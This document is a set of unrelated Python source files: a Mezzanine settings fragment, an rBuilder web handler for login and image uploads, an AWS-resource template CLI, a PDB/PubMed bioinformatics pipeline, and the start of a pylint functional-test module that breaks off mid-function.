# available settings. They are Mezzanine specific, but their values
# are *always* overridden by the project's settings or local_settings
# modules, so the default values defined here will never be used.
register_setting(
name="USE_MODELTRANSLATION",
description=_("If ``True``, the django-modeltranslation application will "
"be automatically added to the ``INSTALLED_APPS`` setting."),
editable=False,
default=False,
)
register_setting(
name="NEVERCACHE_KEY",
description=_("Unique random string like ``SECRET_KEY``, but used for "
"two-phased cache responses. Like ``SECRET_KEY``, should be "
"automatically generated by the ``mezzanine-project`` command."),
editable=False,
default="",
)
|
|
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import errno
import logging
import os
from urllib import unquote
from webob import exc as web_exc
from mint import urltypes
from mint import mint_error
from mint import shimclient
from mint.lib.unixutils import AtomicFile
from mint.web.fields import boolFields, intFields, strFields
from mint.web.decorators import requiresAdmin
from mint.web.decorators import requiresHttps
from mint.web.webhandler import WebHandler
from mint.web.webhandler import normPath
from conary.lib import digestlib
from conary.lib import util
log = logging.getLogger(__name__)
BUFFER = 1024 * 256
class SiteHandler(WebHandler):
def handle(self, context):
self.__dict__.update(**context)
path = normPath(context['cmd'])
cmd = path.split('/')[1]
if not cmd:
self._redirectOldLinks()
try:
method = self.__getattribute__(cmd)
except AttributeError:
raise web_exc.HTTPNotFound()
if not callable(method):
raise web_exc.HTTPNotFound()
return method
@strFields(user = '', password = '')
def pwCheck(self, auth, user, password):
ret = 'false'
if self.cfg.configured and (not self.cfg.SSL
or self.req.scheme == 'https'):
ret = str(bool(self.client.pwCheck(user, password))).lower()
return """<auth valid="%s" />\n""" % ret
@strFields(page = "")
@intFields(step = 1)
def help(self, auth, page, step):
self._redirect("http://docs.rpath.com")
def logout(self, auth):
self._clearAuth()
self._redirectHttp()
@requiresHttps
@strFields(username = None)
def resetPassword(self, auth, username):
userId = self.client.getUserIdByName(username)
user = self.client.getUser(userId)
self._resetPasswordById(userId)
return self._write("passwordReset", email = user.getEmail())
@requiresHttps
@strFields(username = None, password = '', action = 'login', to = '/')
@boolFields(rememberMe = False)
@intFields(x = 0, y = 0)
def processLogin(self, auth, username, password, action, to, rememberMe,
x, y):
if action == 'login':
authToken = (username, password)
client = shimclient.ShimMintClient(self.cfg, authToken, self.db)
auth = client.checkAuth()
if not auth.authorized:
raise mint_error.InvalidLogin
else:
self.session['authToken'] = (authToken[0], '')
self.session['firstPage'] = unquote(to)
self.session.save()
self._redirectHttp()
else:
raise web_exc.HTTPNotFound()
@intFields(fileId = 0, urlType = urltypes.LOCAL)
def downloadImage(self, auth, fileId, urlType):
reqFilename = None
try:
if not fileId:
cmds = self.cmd.split('/')
fileId = int(cmds[1])
reqFilename = cmds[2]
except ValueError:
raise web_exc.HTTPNotFound()
# Screen out UrlTypes that are not visible, except for urltypes.LOCAL,
# which is ALWAYS visible.
if not (urlType == urltypes.LOCAL \
or urlType in self.cfg.visibleUrlTypes):
raise web_exc.HTTPNotFound()
try:
buildId, idx, title, fileUrls = self.client.getFileInfo(fileId)
except mint_error.FileMissing:
raise web_exc.HTTPNotFound()
# Special rules for handling the default case (urltypes.LOCAL):
# If self.cfg.redirectUrlType is set AND that FileUrl exists,
# then use it.
redirectUrl = None
overrideRedirect = None
filename = None
urlIdMap = {}
for urlId, t, u in fileUrls:
urlIdMap[u] = urlId
if t == urltypes.LOCAL:
filename = u
elif t == urlType:
redirectUrl = u
if t == self.cfg.redirectUrlType:
overrideRedirect = u
# For urltype.LOCAL, construct the redirect URL
# Use override redirect if it's set (e.g. redirecting to Amazon S3).
if urlType == urltypes.LOCAL:
if overrideRedirect:
redirectUrl = overrideRedirect
elif filename:
# Don't pass through bad filenames if they are specified in
# the request.
if reqFilename and os.path.basename(filename) != reqFilename:
raise web_exc.HTTPNotFound()
if not os.path.exists(filename):
raise web_exc.HTTPNotFound()
build = self.client.getBuild(buildId)
project = self.client.getProject(build.projectId)
redirectUrl = "/images/%s/%d/%s" % (project.hostname, build.id,
os.path.basename(filename))
if redirectUrl:
self._redirect(redirectUrl)
else:
raise web_exc.HTTPNotFound()
@intFields(userId = None)
@strFields(operation = None)
@requiresAdmin
def processUserAction(self, auth, userId, operation):
user = self.client.getUser(userId)
deletedUser = False
if operation == "user_reset_password":
self._resetPasswordById(userId)
self._setInfo("Password successfully reset for user %s." % \
user.username)
else:
self._addErrors("Please select a valid user adminstration action "
"from the menu.")
if deletedUser:
return self._redirectHttp()
else:
return self._redirectHttp("userInfo?id=%d" % (userId,))
def uploadBuild(self, auth):
method = self.req.method.upper()
if method != "PUT":
raise web_exc.HTTPMethodNotAllowed(allow='PUT')
client = shimclient.ShimMintClient(self.cfg,
(self.cfg.authUser, self.cfg.authPass), self.db)
buildId, fileName = self.req.path_info.split("/")[-2:]
build = client.getBuild(int(buildId))
project = client.getProject(build.projectId)
# make sure the hash we receive from the slave matches
# the hash we gave the slave in the first place.
# this prevents slaves from overwriting arbitrary files
# in the finished images directory.
if not auth.admin:
outputToken = self.req.headers.get('X-rBuilder-OutputToken')
if outputToken != build.getDataValue('outputToken', validate = False):
raise web_exc.HTTPForbidden()
targetFn = os.path.join(self.cfg.imagesPath, project.hostname,
str(buildId), fileName)
util.mkdirChain(os.path.dirname(targetFn))
fObj = AtomicFile(targetFn, 'wb+', prefix='img-', suffix='.tmp')
ctx = digestlib.sha1()
inFile = None
if 'x-uploaded-file' in self.req.headers:
# The frontend proxy has already saved the request body to a
# temporary location, so first try to rename it into place.
try:
os.rename(self.req.headers['x-uploaded-file'], fObj.name)
except OSError, err:
if err.errno != errno.EXDEV:
raise
# Upload dir is on a different filesystem.
inFile = open(self.req.headers['x-uploaded-file'], 'rb')
else:
# No offloading was done. Copy from the request body.
inFile = self.req.body_file
if inFile:
# Copy and digest simultaneously
try:
                copied = util.copyfileobj(inFile, fObj, digest=ctx)
except IOError, err:
log.warning("IOError during upload of %s: %s", targetFn, str(err))
raise web_exc.HTTPBadRequest()
        else:
            # Just digest; also count the bytes so the content-length
            # check below works for offloaded uploads.
            copied = 0
            with open(fObj.name, 'rb') as inFile:
                while True:
                    data = inFile.read(BUFFER)
                    if not data:
                        break
                    ctx.update(data)
                    copied += len(data)
if 'content-length' in self.req.headers:
expected = long(self.req.headers['content-length'])
if copied != expected:
log.warning("Expected %d bytes but got %d bytes for "
"uploaded file %s; discarding", expected, copied,
targetFn)
return ''
fObj.commit(sync=False)
# Write out digest, to be validated when the jobslave posts the final
# image file list.
fObj = AtomicFile(targetFn + '.sha1', 'w')
print >> fObj, ctx.hexdigest()
fObj.commit()
return ''
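    # The conaryrc handler below emits conary client configuration as plain
    # text; example output (hostnames are illustrative):
    #   repositoryMap example.rpath.org https://example.rpath.org/conary/
    #   proxyMap * conarys://rbuilder.example.com/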
def conaryrc(self, auth):
out = ''
if self.req.params.get('repositoryMap') != 'no':
repoMap = {}
for handle in self.reposShim.iterRepositories('NOT disabled'):
repoMap[handle.fqdn] = handle.getURL()
for name, url in sorted(repoMap.items()):
out += 'repositoryMap %s %s\n' % (name, url)
if self.req.params.get('proxyMap') != 'no':
proxy = 'conarys://' + self.req.application_url.split('://')[-1]
out += 'proxyMap * %s\n' % proxy
self.response.content_type = 'text/plain'
return out
|
|
# -*- coding: UTF-8 -*-
"""
Usage:
plumbum <template> <namespace> [region] [options]...
Options:
template path to the jinja2 template
namespace AWS namespace. Currently supports: elasticache, elb, ec2, rds, asg, sqs
region AWS region [default: us-east-1]
options key value combinations, they can be tags or any other property
Examples:
plumbum elb.yaml.j2 elb
plumbum elb.yaml.j2 elb us-west-2
plumbum ec2.yaml.j2 ec2 environment=production
plumbum ec2.yaml.j2 ec2 us-west-2 environment=production
Outputs to stdout.
About Templates:
Templates are used to generate config.yml files based on running resources.
They're written in jinja2, and have these variables available:
filters A dictionary of the filters that were passed in
region The region the resource is located in
resources A list of the resources as boto objects
"""
from __future__ import unicode_literals
import re
import sys
import boto
import boto.dynamodb
import boto.ec2
import boto.ec2.elb
import boto.rds
import boto.elasticache
import boto.ec2.autoscale
import boto.kinesis
import boto.sqs
import jinja2
import os.path
__version__ = '0.8.1'
# DEFAULT_NAMESPACE = 'ec2' # TODO
DEFAULT_REGION = 'us-east-1'
def get_property_func(key):
"""
Get the accessor function for an instance to look for `key`.
Look for it as an attribute, and if that does not work, look to see if it
is a tag.
"""
def get_it(obj):
try:
return getattr(obj, key)
except AttributeError:
return obj.tags.get(key)
return get_it
def filter_key(filter_args):
def filter_instance(instance):
return all([value == get_property_func(key)(instance)
for key, value in filter_args.items()])
return filter_instance
def lookup(instances, filter_by=None):
if filter_by is not None:
return list(filter(filter_key(filter_by), instances))
return instances
def interpret_options(options):
"""Parse all the command line options."""
# template always has to be index 0
template = options[0]
# namespace always has to be index 1. Support 'ec2' (human friendly) and
# 'AWS/EC2' (how CloudWatch natively calls these things)
namespace = options[1].rsplit('/', 2)[-1].lower()
next_idx = 2
# region might be index 2
region = ''
    if len(options) > 2 and re.match(r'^\w+\-[\w\-]+\-\d+$', options[2]):
        region = options[2]
        next_idx += 1
region = region or boto.config.get('Boto', 'ec2_region_name', 'us-east-1')
filter_by = {}
extras = []
for arg in options[next_idx:]:
if arg.startswith('-'):
# throw these away for now
extras.append(arg)
elif '=' in arg:
            key, value = arg.split('=', 1)
filter_by[key] = value
else:
# throw these away for now
extras.append(arg)
return template, namespace, region, filter_by, extras
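# For example (mirroring the usage shown in the module docstring):
#   interpret_options(['ec2.yaml.j2', 'AWS/EC2', 'us-west-2',
#                      'environment=production'])
#   -> ('ec2.yaml.j2', 'ec2', 'us-west-2', {'environment': 'production'}, [])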
def list_ec2(region, filter_by_kwargs):
"""List running ec2 instances."""
conn = boto.ec2.connect_to_region(region)
instances = conn.get_only_instances()
return lookup(instances, filter_by=filter_by_kwargs)
def list_elb(region, filter_by_kwargs):
"""List all load balancers."""
conn = boto.ec2.elb.connect_to_region(region)
instances = conn.get_all_load_balancers()
return lookup(instances, filter_by=filter_by_kwargs)
def list_rds(region, filter_by_kwargs):
"""List all RDS thingys."""
conn = boto.rds.connect_to_region(region)
instances = conn.get_all_dbinstances()
return lookup(instances, filter_by=filter_by_kwargs)
def list_elasticache(region, filter_by_kwargs):
    """List all ElastiCache Clusters."""
    # Note: the response is a plain JSON dict, so the tag-based filters used
    # by the other listers are not applied here; all cluster ids come back.
    conn = boto.elasticache.connect_to_region(region)
req = conn.describe_cache_clusters()
data = req["DescribeCacheClustersResponse"]["DescribeCacheClustersResult"]["CacheClusters"]
clusters = [x['CacheClusterId'] for x in data]
return clusters
def list_autoscaling_group(region, filter_by_kwargs):
"""List all Auto Scaling Groups."""
conn = boto.ec2.autoscale.connect_to_region(region)
groups = conn.get_all_groups()
return lookup(groups, filter_by=filter_by_kwargs)
def list_sqs(region, filter_by_kwargs):
"""List all SQS Queues."""
conn = boto.sqs.connect_to_region(region)
queues = conn.get_all_queues()
return lookup(queues, filter_by=filter_by_kwargs)
def list_kinesis_applications(region, filter_by_kwargs):
"""List all the kinesis applications along with the shards for each stream"""
conn = boto.kinesis.connect_to_region(region)
streams = conn.list_streams()['StreamNames']
kinesis_streams = {}
for stream_name in streams:
shard_ids = []
shards = conn.describe_stream(stream_name)['StreamDescription']['Shards']
for shard in shards:
shard_ids.append(shard['ShardId'])
kinesis_streams[stream_name] = shard_ids
return kinesis_streams
def list_dynamodb(region, filter_by_kwargs):
"""List all DynamoDB tables."""
conn = boto.dynamodb.connect_to_region(region)
tables = conn.list_tables()
return lookup(tables, filter_by=filter_by_kwargs)
list_resources = {
'ec2': list_ec2,
'elb': list_elb,
'rds': list_rds,
'elasticache': list_elasticache,
'asg': list_autoscaling_group,
'sqs': list_sqs,
'kinesisapp': list_kinesis_applications,
'dynamodb': list_dynamodb
}
def main():
if '--version' in sys.argv:
print(__version__)
sys.exit()
if len(sys.argv) < 3:
print(__doc__)
sys.exit()
template, namespace, region, filters, __ = interpret_options(sys.argv[1:])
# get the template first so this can fail before making a network request
fs_path = os.path.abspath(os.path.dirname(template))
loader = jinja2.FileSystemLoader(fs_path)
jinja2_env = jinja2.Environment(loader=loader)
template = jinja2_env.get_template(os.path.basename(template))
    # ensure a valid region is set
if region not in [r.name for r in boto.ec2.regions()]:
raise ValueError("Invalid region:{0}".format(region))
# should I be using ARNs?
try:
resources = list_resources[namespace](region, filters)
except KeyError:
print('ERROR: AWS namespace "{}" not supported or does not exist'
.format(namespace))
sys.exit(1)
print(template.render({
'filters': filters,
'region': region, # Use for Auth config section if needed
'resources': resources,
}))
if __name__ == '__main__':
main()
|
|
# -*- coding: utf-8 -*-
import sys
import traceback
import datetime
import time
import os
import logging
import MySQLdb
import labio.configWrapper
import labio.argParseWrapper
import labio.logWrapper
import labio.dbWrapper
from xml.etree import ElementTree
from bs4 import *
from components import PDB
from components.PubMed import *
from suds.client import Client
#----------------------------------------------------------------------------------------------------------------------#
def retrieve_structures(cfg,log):
final_list = None
try:
resList = []
for item in cfg.pdbQueries:
res = PDB.execute_advanced_query(log, cfg.pdbAdvancedSearchURL,item)
resList.append(res.split('\n'))
        log.info('Intersecting results...')
        # merge_results returns a printable expression; eval it back into a
        # list and drop any empty IDs.
        final_list = list(eval(PDB.merge_results(resList)))
        final_list = filter(len, final_list)
except:
log.error(traceback.format_exc())
return final_list
def save_structures(cfg,log,db,listItem):
try:
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateCandidate)
for item in listItem:
log.info('Saving Candidate: %s...' % item)
if PDB.get_file(cfg,log,item):
pdb = PDB.parse_header(cfg,item)
db.executeCommand(cfg.sqlInsertCandidate,(item, MySQLdb.escape_string(PDB.get_content()),
MySQLdb.escape_string(pdb['name']),
MySQLdb.escape_string(pdb['author']),
pdb['deposition_date'],
pdb['release_date'], '0',
pdb['resolution'],
pdb['head'],
pdb['structure_method'],
pdb['compound']['1']['chain'] if 'chain' in pdb['compound']['1'] else '' ,
pdb['compound']['1']['ec_number'] if 'ec_number' in pdb['compound']['1'] else '',
pdb['source']['1']['organism_taxid'] if 'organism_taxid' in pdb['source']['1'] else '',
pdb['source']['1']['organism_scientific'] if 'organism_scientific' in pdb['source']['1'] else '',
pdb['source']['1']['expression_system_taxid'] if 'expression_system_taxid' in pdb['source']['1'] else '',
pdb['source']['1']['expression_system'] if 'expression_system' in pdb['source']['1'] else ''))
db.commit()
except:
log.error(traceback.format_exc())
db.rollback()
def build_training_set(cfg,log,db,pm):
try:
listAdded = []
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateTrainingSet)
log.info('Getting Reference articles...')
candidates = db.getData(cfg.sqlSelectCandidates).fetchall()
for addFile in candidates:
key = addFile[0]
f = PDB.parse_prody(cfg,key)
if f.status == 'Imported' and (f.journal.pmid not in listAdded) and f.journal.pmid != "":
article = pm.get_pubmed_article(f.journal.pmid)
pm.save_pubmed_article(f.journal.pmid,article,'Training')
listAdded.append(f.journal.pmid)
db.commit()
except:
log.error(traceback.format_exc())
db.rollback()
raise Exception('Training Set was not built.')
def search_literature(cfg,log,db,pm):
try:
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateLiterature)
result = pm.search_pubmed()
if result:
log.info('Number of entries: %s...' % result['Count'])
for item in result['IdList']:
try:
resCount = db.getData(cfg.sqlCountLiterature % (item))
row = resCount.fetchall()
if row[0][0] == 0:
article = pm.get_pubmed_article(item)
if not pm.save_pubmed_article(item, article, 'Literature'):
print(article)
resCount.close()
except:
log.error(traceback.format_exc())
db.commit()
else:
log.info('No PubMed literature found.')
except:
db.rollback()
log.error(traceback.format_exc())
raise Exception('Literature not added.')
def rank_literature(cfg,log,db):
e = None
try:
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateWords)
client = Client(cfg.MedLineRankURL)
log.info('Preparing Training Set...')
trainingCursor = db.getData(cfg.sqlSelectTrainingSet).fetchall()
trainingList = []
for line in trainingCursor:
trainingList.append(line[0])
trainingSet = cfg.pubmedDelimiter.join(trainingList)
log.info('Preparing Articles to Rank...')
testingCursor = db.getData(cfg.sqlSelectTestingSet).fetchall()
testingList = []
for line in testingCursor:
testingList.append(line[0])
testingSet = cfg.pubmedDelimiter.join(testingList)
log.info('Calling the Web Service...')
html = client.service.rank('list',trainingSet,'medline','','list',testingSet)
fw = open(os.path.join(cfg.extractFilesFolder,cfg.pubmedRankFile), "w")
if cfg.pubmedFindString in html:
fw.write(html)
else:
fw.write(html.decode('base64'))
fw.close()
e = ElementTree.parse(os.path.join(cfg.extractFilesFolder,cfg.pubmedRankFile)).getroot()
if e is not None:
log.info('Updating articles...')
for abstract in e.findall(cfg.rankAbstracts):
db.executeCommand(cfg.sqlUpdateLiterature,(abstract.get('rank'),abstract.find('pvalue').text,abstract.find('link').text,abstract.find('pmid').text))
log.info('Saving word list...')
for abstract in e.findall(cfg.rankWords):
db.executeCommand(cfg.sqlInsertWords,(abstract.get('rank'),abstract.find('value').text,abstract.find('weight').text))
db.commit()
except:
log.error(traceback.format_exc())
db.rollback()
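# The web service above sometimes returns the ranking XML base64-encoded, so
# rank_literature() sniffs for a known marker string before deciding whether
# to decode. A version-neutral sketch of that pattern using the base64 module:
def _example_decode_if_needed(payload, marker):
    import base64
    return payload if marker in payload else base64.b64decode(payload)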
def relate_structures(cfg,log,db, pm):
try:
log.info('Merging Training and Result Sets...')
rows = db.getData(cfg.sqlCopyTrainingSetIntoLiterature).fetchall()
for row in rows:
article = pm.get_pubmed_article(row['pubmed_id'])
pm.save_pubmed_article(row['pubmed_id'], article, 'Literature')
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateRel)
candidates = db.getData(cfg.sqlSelectCandidates).fetchall()
for addFile in candidates:
key = addFile['pdbID']
f = PDB.parse_prody(cfg,key)
if f.journal.pmid != "":
db.executeCommand(cfg.sqlInsertRel, (addFile['pdbID'], f.journal.pmid, 'Originator'))
log.info('Opening article to find references to structures...')
fileName = pm.get_related_pubmed_articles(f.journal.pmid)
for item in fileName[0]['LinkSetDb'][0]['Link']:
db.executeCommand(cfg.sqlInsertRel, (addFile['pdbID'], item['Id'], 'Related'))
db.commit()
except:
db.rollback()
log.error(traceback.format_exc())
raise Exception('Training Set was not built.')
def retrieve_ligands(cfg,log,db):
try:
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateLigands)
structs = db.getData(cfg.sqlSelectCandidates).fetchall()
for strut in structs:
json_string = PDB.get_ligands(cfg,strut[0])
if json_string and json_string['structureId'] and json_string['structureId']['ligandInfo']:
if type(json_string['structureId']['ligandInfo']['ligand']) == dict:
item = json_string['structureId']['ligandInfo']['ligand']
db.executeCommand(cfg.sqlInsertLigand,(strut[0], item['@chemicalID'], item['chemicalName'],item['@type'],item['formula'],item['@molecularWeight']))
else:
for item in json_string['structureId']['ligandInfo']['ligand']:
db.executeCommand(cfg.sqlInsertLigand,(strut[0], item['@chemicalID'], item['chemicalName'],item['@type'],item['formula'],item['@molecularWeight']))
db.commit()
except:
log.error(traceback.format_exc())
db.rollback()
def retrieve_go_terms(cfg,log,db):
try:
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateGoTerms)
structs = db.getData(cfg.sqlSelectCandidates).fetchall()
for strut in structs:
log.info('Getting GO terms for structure %s' % strut[0])
json_string = PDB.get_go_terms(cfg,strut[0])
if json_string and json_string['goTerms'] and json_string['goTerms']['term']:
if type(json_string['goTerms']['term']) == dict:
item = json_string['goTerms']['term']
                    # guard on the key actually read below (it lives under 'detail')
                    if '@synonyms' in item['detail']:
                        db.executeCommand(cfg.sqlInsertGoTerms,(strut[0], item['@chainId'], item['@id'],item['detail']['@name'],item['detail']['@definition'],item['detail']['@synonyms'],item['detail']['@ontology']))
                    else:
                        db.executeCommand(cfg.sqlInsertGoTerms,(strut[0], item['@chainId'], item['@id'],item['detail']['@name'],item['detail']['@definition'],None,item['detail']['@ontology']))
                else:
                    for item in json_string['goTerms']['term']:
                        if '@synonyms' in item['detail']:
                            db.executeCommand(cfg.sqlInsertGoTerms,(strut[0], item['@chainId'], item['@id'],item['detail']['@name'],item['detail']['@definition'],item['detail']['@synonyms'],item['detail']['@ontology']))
                        else:
                            db.executeCommand(cfg.sqlInsertGoTerms,(strut[0], item['@chainId'], item['@id'],item['detail']['@name'],item['detail']['@definition'],None,item['detail']['@ontology']))
db.commit()
    except:
        log.error(traceback.format_exc())
        db.rollback()
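# Both retrieve_ligands() and retrieve_go_terms() repeat the same dict-vs-list
# branching because the PDB web service returns one entry as a dict and several
# as a list. A small hypothetical helper that would normalise this:
def _as_list(value):
    """Wrap a lone dict entry in a list so callers can always iterate."""
    return [value] if isinstance(value, dict) else value
# e.g.: for item in _as_list(json_string['goTerms']['term']): ...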
def retrieve_genbank_info(cfg,log,db):
try:
structs = db.getData(cfg.sqlSelectCandidates).fetchall()
html = None
for item in structs:
html = None
try:
html = PDB.get_genbank_info(cfg,log,item[0])
tree = ElementTree.fromstring(html)
gb_sequence = tree.findall('.//GBSeq/GBSeq_sequence')[0].text
gb_taxonomy = tree.findall('.//GBSeq/GBSeq_taxonomy')[0].text
gb_seq_length = tree.findall('.//GBSeq/GBSeq_length')[0].text
gb_seqids = tree.findall('.//GBSeq/GBSeq_other-seqids/GBSeqid')
gb_gi = None
for node in gb_seqids:
if 'gi|' in node.text:
gb_gi = node.text.replace('gi|','')
db.executeCommand(cfg.sqlUpdateGenBank,(gb_taxonomy, gb_sequence, gb_seq_length, gb_gi, item[0]))
log.info('Updating information with GenBank data for structure %s.' % item[0])
except:
log.info('No information found on GenBank for structure %s.' % item[0])
#if html is not None:
# raise
time.sleep(2)
db.commit()
except:
log.error(traceback.format_exc())
def retrieve_pathways(cfg,log,db):
try:
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncatePathway)
structs = db.getData(cfg.sqlSelectCandidates).fetchall()
html = None
for item in structs:
log.info('Finding pathway data for structure %s.' % item[0])
html = None
try:
html = PDB.get_pathways_info(cfg, log, item[1])
soup = BeautifulSoup(html)
links = soup.findAll('a')
for link in links:
if 'href' in link.attrs[0]:
if 'show_pathway' in link.attrs[0][1]:
db.executeCommand(cfg.sqlInsertPathway,(item[0],cfg.keggRootURL + link.attrs[0][1],link.contents[0]))
except:
raise
db.commit()
except:
log.error(traceback.format_exc())
#----------------------------------------------------------------------------------------------------------------------#
def Execute(cfgName):
returnValue = 0
print(datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
print("Loading Configuration... %s" % cfgName)
fileConfig = labio.configWrapper.load_configuration(cfgName)
if fileConfig.isLoaded:
#Initializing the log system
try:
nlogging = labio.logWrapper.return_logging(fileConfig.log)
except:
returnValue = 1
print(traceback.format_exc())
if returnValue == 0:
try:
nlogging.info('Starting process...')
#Connecting to the MySQL database
db2 = labio.dbWrapper.dbGenericWrapper(fileConfig.database).getDB()
if db2.isDatabaseOpen():
nlogging.info('Database opened.')
nlogging.info('Starting Integration Objects.')
pmed = PubMed(fileConfig,nlogging,db2)
if fileConfig.Actions["retrieve_structures"] or fileConfig.RunAll:
nlogging.info('Retrieving PDB Structures...')
final_list = retrieve_structures(fileConfig,nlogging)
if final_list:
#nlogging.info('Number of structures found: %s' % (len(final_list)))
nlogging.info('Adding Candidates to the database...')
save_structures(fileConfig,nlogging,db2,final_list)
else:
nlogging.info('No PDB structures found.')
if fileConfig.Actions['retrieve_ligands'] or fileConfig.RunAll:
nlogging.info('Finding Ligands...')
retrieve_ligands(fileConfig,nlogging,db2)
if fileConfig.Actions['retrieve_go_terms'] or fileConfig.RunAll:
nlogging.info('Finding related Gene Ontology terms...')
retrieve_go_terms(fileConfig,nlogging,db2)
if fileConfig.Actions['retrieve_genbank_info'] or fileConfig.RunAll:
nlogging.info('Finding GenBank Data...')
retrieve_genbank_info(fileConfig,nlogging,db2)
if fileConfig.Actions['retrieve_pathways'] or fileConfig.RunAll:
nlogging.info('Finding Pathways...')
retrieve_pathways(fileConfig,nlogging,db2)
if fileConfig.Actions['refresh_list'] or fileConfig.RunAll:
nlogging.info('Refreshing list of OA articles')
pmed.retrieve_file_list()
if fileConfig.Actions["build_training_set"] or fileConfig.RunAll:
if pmed.is_pubmed_online():
nlogging.info('Building Training Set...')
build_training_set(fileConfig,nlogging,db2,pmed)
else:
raise Exception('Pubmed services are not online.')
if fileConfig.Actions["search_literature"] or fileConfig.RunAll:
if pmed.is_pubmed_online():
nlogging.info('Searching articles...')
search_literature(fileConfig,nlogging,db2,pmed)
else:
raise Exception('Pubmed services are not online.')
if fileConfig.Actions['rank_literature'] or fileConfig.RunAll:
nlogging.info('Ranking articles...')
rank_literature(fileConfig,nlogging,db2)
if fileConfig.Actions['relate_structures'] or fileConfig.RunAll:
nlogging.info('Relating Articles to Structures...')
relate_structures(fileConfig,nlogging,db2,pmed)
if fileConfig.Actions['Test'] and not(fileConfig.RunAll):
pmed = pmed.get_pubmed_article('25714709')
print(pmed)
db2.commit()
nlogging.info('Database closed.')
db2.close()
else:
raise Exception('Database not opened.')
nlogging.info('Ending process...')
except:
returnValue = 1
nlogging.error('Unexpected error: %s' % traceback.format_exc())
nlogging.info('Execution aborted due to errors. Please see the log file for more details.')
else:
returnValue = 1
else:
returnValue = 1
return returnValue
#----------------------------------------------------------------------------------------------------------------------#
if __name__ == '__main__':
exitCode = 0
try:
if len(sys.argv) < 2:
cfgName = sys.argv[0].replace(".py",".config")
print(cfgName)
else:
cfgName = sys.argv[1]
exitCode = Execute(cfgName)
except:
print(traceback.format_exc())
exitCode = 1
sys.exit(exitCode)
|
|
# Copyright (c) 2003-2016 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/COPYING
"""Functional full-module tests for PyLint."""
import csv
import collections
import io
import operator
import os
import re
import sys
import platform
import unittest
import six
from six.moves import configparser
from pylint import checkers
from pylint import interfaces
from pylint import lint
from pylint import reporters
from pylint import utils
class test_dialect(csv.excel):
if sys.version_info[0] < 3:
delimiter = b':'
lineterminator = b'\n'
else:
delimiter = ':'
lineterminator = '\n'
csv.register_dialect('test', test_dialect)
class NoFileError(Exception):
pass
# Notes:
# - for the purpose of this test, the confidence levels HIGH and UNDEFINED
# are treated as the same.
# TODOs
# - implement exhaustivity tests
# If message files should be updated instead of checked.
UPDATE = False
class OutputLine(collections.namedtuple('OutputLine',
['symbol', 'lineno', 'object', 'msg', 'confidence'])):
@classmethod
def from_msg(cls, msg):
return cls(
msg.symbol, msg.line, msg.obj or '', msg.msg.replace("\r\n", "\n"),
msg.confidence.name
if msg.confidence != interfaces.UNDEFINED else interfaces.HIGH.name)
@classmethod
def from_csv(cls, row):
confidence = row[4] if len(row) == 5 else interfaces.HIGH.name
return cls(row[0], int(row[1]), row[2], row[3], confidence)
def to_csv(self):
if self.confidence == interfaces.HIGH.name:
return self[:-1]
else:
return self
# Common sub-expressions.
_MESSAGE = {'msg': r'[a-z][a-z\-]+'}
# Matches a #,
# - followed by a line number with an optional +/- offset (optional),
# - followed by a comparison operator and a Python version (optional),
# - followed by a list of bracketed message symbols.
# Used to extract expected messages from testdata files.
_EXPECTED_RE = re.compile(
r'\s*#\s*(?:(?P<line>[+-]?[0-9]+):)?'
r'(?:(?P<op>[><=]+) *(?P<version>[0-9.]+):)?'
r'\s*\[(?P<msgs>%(msg)s(?:,\s*%(msg)s)*)\]' % _MESSAGE)
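# Example of what _EXPECTED_RE extracts from a functional-test source line
# (a sketch; the asserted group values follow from the pattern above):
def _example_expected_re():
    match = _EXPECTED_RE.search("x = 1  # +1: [missing-docstring, invalid-name]")
    assert match.group('line') == '+1'
    assert match.group('msgs') == 'missing-docstring, invalid-name'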
def parse_python_version(version_str):
    return tuple(int(part) for part in version_str.split('.'))
class TestReporter(reporters.BaseReporter):
def handle_message(self, msg):
self.messages.append(msg)
def on_set_current_module(self, module, filepath):
self.messages = []
def display_reports(self, layout):
"""Ignore layouts."""
class TestFile(object):
"""A single functional test case file with options."""
_CONVERTERS = {
'min_pyver': parse_python_version,
'max_pyver': parse_python_version,
'requires': lambda s: s.split(',')
}
def __init__(self, directory, filename):
self._directory = directory
self.base = filename.replace('.py', '')
self.options = {
'min_pyver': (2, 5),
'max_pyver': (4, 0),
'requires': [],
'except_implementations': [],
}
self._parse_options()
def _parse_options(self):
cp = configparser.ConfigParser()
cp.add_section('testoptions')
try:
cp.read(self.option_file)
except NoFileError:
pass
for name, value in cp.items('testoptions'):
conv = self._CONVERTERS.get(name, lambda v: v)
self.options[name] = conv(value)
@property
def option_file(self):
return self._file_type('.rc')
@property
def module(self):
package = os.path.basename(self._directory)
return '.'.join([package, self.base])
@property
def expected_output(self):
return self._file_type('.txt', check_exists=False)
@property
def source(self):
return self._file_type('.py')
def _file_type(self, ext, check_exists=True):
name = os.path.join(self._directory, self.base + ext)
if not check_exists or os.path.exists(name):
return name
else:
raise NoFileError
_OPERATORS = {
'>': operator.gt,
'<': operator.lt,
'>=': operator.ge,
'<=': operator.le,
}
def parse_expected_output(stream):
return [OutputLine.from_csv(row) for row in csv.reader(stream, 'test')]
def get_expected_messages(stream):
"""Parses a file and get expected messages.
:param stream: File-like input stream.
:returns: A dict mapping line,msg-symbol tuples to the count on this line.
"""
messages = collections.Counter()
for i, line in enumerate(stream):
match = _EXPECTED_RE.search(line)
if match is None:
continue
line = match.group('line')
if line is None:
line = i + 1
elif line.startswith('+') or line.startswith('-'):
